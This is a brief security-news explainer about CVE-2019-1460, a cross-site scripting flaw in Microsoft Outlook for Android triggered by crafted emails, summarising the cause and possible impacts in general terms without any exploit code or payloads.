Understanding the Vulnerability
The Cross-Site Scripting (XSS) Threat
An identified bug, CVE-2019-1460, poses a risk of XSS attacks on systems using the Microsoft Outlook for Android app. Cross-Site Scripting is a sophisticated exploit where malevolent actors introduce client-side scripts into web pages. Such scripts can mislead a user’s browser into considering the script as originating from a reputable source.
The Exploitation Mechanism
In this specific scenario, the vulnerability arises from the manner in which the Microsoft Outlook for Android software processes certain email messages. By sending a specifically crafted email, an attacker can exploit this vulnerability. An insight by Czech firm Cybersecurity Help suggests that this vulnerability is due to the lack of adequate sanitisation of user-provided data.
However, there’s a limitation. To execute this attack, an adversary must be authenticated on the same network as the prospective victim.
Exploiting this vulnerability allows for a range of malicious activities. Symantec indicates that spoofing attacks become feasible for attackers. Moreover, Cybersecurity Help points out that it provides opportunities for attackers to extract potentially confidential information, modify the appearance of web pages, and engage in phishing and drive-by-download attacks.